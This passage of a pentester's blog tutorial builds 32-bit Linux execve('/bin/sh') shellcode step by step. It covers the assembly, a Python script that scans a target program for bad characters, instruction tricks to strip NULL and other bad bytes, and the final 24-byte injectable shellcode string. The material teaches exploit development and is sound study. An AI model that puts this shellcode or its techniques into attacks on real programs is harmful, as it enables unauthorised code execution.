    push 0
    push ebx
    mov ecx, esp
    ; NULL
    mov edx, 0

    ; execve("//bin/sh", { "//bin/sh", NULL }, NULL )
    mov eax, 11
    int 0x80

    ; exit()
    mov eax, 1
    int 0x80

jamarir@kali:~$ nasm execve.asm -f elf32 -g
jamarir@kali:~$ ld execve.o -o execve.elf -m elf_i386;
jamarir@kali:~$ ./execve.elf;
$ echo 'Hello World! (again...)'
Hello World! (again...)

Get rid of these BAD & EXTRA bytes !

The issue with our above shellcode (execve binary) is that it contains many NULL bytes:

jamarir@kali:~$ objcopy -O binary --only-section=.text execve.elf /dev/stdout |xxd -i
  0x6a, 0x00, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69,
  0x89, 0xe3, 0x6a, 0x00, 0x53, 0x89, 0xe1, 0xba, 0x00, 0x00, 0x00, 0x00,
  0xb8, 0x0b, 0x00, 0x00, 0x00, 0xcd, 0x80, 0xb8, 0x01, 0x00, 0x00, 0x00,
  0xcd, 0x80

Even if it worked here, the purpose of a shellcode is to be injected into a user’s input (generally a string), and executed. But if our shellcode contains NULL bytes, then our user input / shellcode would be truncated. In our example, if we inject such shellcode in a string, the program would only interpret the following:

  0x6a

Which breaks our shellcode.
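
To see how much of the shellcode is affected, we can load the xxd output above in Python and look for the NULL bytes. This is just a quick sketch mimicking what a C string copy would keep:

```python
# Bytes copied from the xxd -i output above.
shellcode = bytes([
    0x6a, 0x00, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69,
    0x89, 0xe3, 0x6a, 0x00, 0x53, 0x89, 0xe1, 0xba, 0x00, 0x00, 0x00, 0x00,
    0xb8, 0x0b, 0x00, 0x00, 0x00, 0xcd, 0x80, 0xb8, 0x01, 0x00, 0x00, 0x00,
    0xcd, 0x80,
])

null_offsets = [i for i, b in enumerate(shellcode) if b == 0]
survives = shellcode.split(b"\x00", 1)[0]   # what a C string copy would keep

print(len(shellcode), len(null_offsets), survives.hex())
```

Out of the 38 bytes, 12 are NULL, and only the very first byte survives the truncation.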

String Terminators

To identify all the string terminators in a string through scanf("%s"), let’s consider the following C code, reading a string from the user’s input:

#include <stdio.h>

void main() {
    char buf1[100];
    printf("Input: ");
    scanf("%s", buf1);
    printf("%s\n", buf1);
}
jamarir@kali:~$ gcc -m32 -fno-pic -o main main.c

When injecting string terminators, such as \x00, or \x0b, the string terminates:

jamarir@kali:~$ python2 -c "print'AAAA'+'\x00'+'BBBB'" |./main
Input: AAAA
jamarir@kali:~$ python2 -c "print'AAAA'+'\x0b'+'BBBB'" |./main
Input: AAAA

The following python script can be used in order to scan for bad chars (i.e. string terminators):

#!/usr/bin/python3
import string
import subprocess
import sys

# usage: ./badchars.py './main'
for x in string.hexdigits.lower()[:16]:
    for y in string.hexdigits.lower()[:16]:
        payload = b"AAAA" + bytes([int(x + y, 16)]) + b"BBBB"
        res = subprocess.run(
            [sys.argv[1]],
            input=payload,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE
        ).stdout.decode(errors="replace")
        if not ('AAAA' in res and 'BBBB' in res):
            print(f'\\x{x}{y} is a bad char')

Which gives the following bytes:

jamarir@kali:~$ python badchars.py './main'
\x00 is a bad char
\x09 is a bad char
\x0a is a bad char
\x0b is a bad char
\x0c is a bad char
\x0d is a bad char
\x20 is a bad char

The bad chars vary from function to function. For instance, if we used fgets() to read the user input instead:

    fgets(buf1, sizeof(buf1), stdin);

The bad chars would only have been NULL and LF:

jamarir@kali:~$ python badchars.py './main'
\x00 is a bad char
\x0a is a bad char

Shellcode Cleanup

Therefore, when writing a shellcode, we mustn’t put explicit or implicit bad chars into the instructions (an online x86 assembler can be used to check the bytes each instruction assembles to). For instance, the following instructions should be avoided:

  • mov eax, 1: This instruction writes 1 into the EAX register, whose size is 32 bits. Therefore, the immediate is encoded on 4 bytes and the instruction contains implicit NULL bytes (b8 01 00 00 00).

    A better alternative is to first NULL the eax register, and then set its low byte al to 1, i.e. xor eax, eax (31 c0) followed by mov al, 1 (b0 01).

  • NULL: Any instruction containing a 0 should obviously be discarded, such as cmp esi, 0 or push 0 (6a 00) for example.

    Again, a better alternative is to first NULL a register (e.g. xor eax, eax), and then play with it (e.g. push eax, which assembles to 50).

  • mov al, 11: Our execve syscall is 11. Therefore, setting al to 11 implies the insertion of a bad char (b0 0b, where 0x0b is the vertical tab found earlier).

    An alternative would be to first set it to 14, then subtract 3, i.e. mov al, 14 (b0 0e) followed by sub al, 3 (2c 03).
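
The three cases above can be checked mechanically. In the Python sketch below, the encodings are hand-assembled (the same byte patterns appear in the dumps of this article), BAD_CHARS is the scanf("%s") list found earlier, and bad_chars_in is a hypothetical helper:

```python
# Bad chars reported by badchars.py for scanf("%s").
BAD_CHARS = bytes([0x00, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20])

# Hand-assembled encodings of the instructions discussed above.
ENCODINGS = {
    "mov eax, 1": bytes.fromhex("b801000000"),
    "xor eax, eax; mov al, 1": bytes.fromhex("31c0b001"),
    "push 0": bytes.fromhex("6a00"),
    "xor eax, eax; push eax": bytes.fromhex("31c050"),
    "mov al, 11": bytes.fromhex("b00b"),
    "mov al, 14; sub al, 3": bytes.fromhex("b00e2c03"),
}


def bad_chars_in(code):
    """Return the sorted list of bad byte values present in `code`."""
    return sorted({b for b in code if b in BAD_CHARS})


for asm, code in ENCODINGS.items():
    found = ", ".join(f"\\x{b:02x}" for b in bad_chars_in(code)) or "none"
    print(f"{asm:26} {code.hex():12} bad chars: {found}")
```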

Shellcode Shrinkage

Also, we might shrink our shellcode:

  • Removing the last exit() syscall, as our main purpose is solely to spawn a shell, which we already did.

  • Using the cdq instruction. This instruction copies the sign bit (bit 31) of eax into every bit of edx. In the particular case where eax is NULL, edx ends up NULL as well. cdq being a 1-byte instruction (99), we save 1 byte compared to the equivalent mov edx, eax (89 c2).

  • NULL’ing the second execve's argument, as it is not compulsory to spawn a shell.
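
The effect of cdq on edx is easy to model. Here is a minimal Python sketch (the cdq function below only mimics the instruction’s result, it is not an emulator):

```python
def cdq(eax):
    """Return edx after cdq: bit 31 of eax copied into every bit of edx."""
    return 0xFFFFFFFF if eax & 0x80000000 else 0x00000000


print(hex(cdq(0x00000000)))   # eax NULL'ed, as in our shellcode
print(hex(cdq(0x0000000B)))   # any positive value also clears edx
print(hex(cdq(0x80000000)))   # a negative value sets every bit of edx
```

So cdq only works as a replacement for mov edx, eax here because eax is known to be NULL at that point.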

Our final shellcode looks like:

BITS 32
section .text
global _start
_start:
    ; "//bin/sh"
    xor eax, eax
    push eax
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp
    ; NULL
    mov ecx, eax
    ; NULL
    cdq

    ; execve("//bin/sh", NULL, NULL )
    mov al, 14
    sub al, 3
    int 0x80
jamarir@kali:~$ nasm execve.asm -f elf32 -g; ld execve.o -o execve.elf -m elf_i386;
jamarir@kali:~$ objcopy -O binary --only-section=.text execve.elf /dev/stdout |xxd -i |sed -n 's/0x/\\x/gp' |sed -n 's/,\?\s*//gp' |tr -d '\n'
\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\x99\xb0\x0e\x2c\x03\xcd\x80
jamarir@kali:~$ expr length $(python2 -c "print'\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\x99\xb0\x0e\x2c\x03\xcd\x80'")
23
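
As a sanity check, the final bytes can be loaded in Python to count them and look for bad chars. This is a sketch using the scanf("%s") list found earlier:

```python
# Final shellcode, split per instruction for readability.
shellcode = bytes.fromhex(
    "31c0" "50" "686e2f7368" "682f2f6269" "89e3" "89c1" "99" "b00e" "2c03" "cd80"
)
BAD_CHARS = {0x00, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20}

found = sorted(b for b in set(shellcode) if b in BAD_CHARS)
print(len(shellcode), found)
```

Counted this way, the dump is 24 bytes long and free of bad chars. expr length counts characters rather than bytes, so in a UTF-8 locale the trailing cd 80 pair, which happens to form a valid 2-byte sequence, is likely counted once, which would explain the 23 above.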

We could even save one extra byte using a xor / mul trick to set ecx, eax and edx to NULL. But let’s call it a day.

Written by

jamarir

Jamaledine AMARIR. Pentester, CTF Player, Game Modding enthusiast | CRTO